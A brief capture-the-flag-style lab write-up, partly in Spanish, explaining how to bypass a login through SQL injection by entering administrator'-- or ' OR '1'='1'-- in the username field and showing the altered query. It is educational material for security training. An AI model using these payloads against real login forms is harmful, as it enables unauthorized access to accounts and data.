02 Lab: SQL injection vulnerability allowing login bypass
Objetivo
This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.Solución
Modificamos el campo
usuarioutilizando el valoradministrator'--De esta manera podremos acceder al panel de administración
SELECT * FROM USERS WHERE username = '$user' and password = '$password'
$usuario = "administrator'-- "
SELECT * FROM USERS WHERE username = 'administrator'--' and password = '$password'

Alternativa
Cambiamos los parámetros
usuarioycontraseñacon los camposadministratory'OR'1'='1'--
Previous01 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden dataNext04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Last updated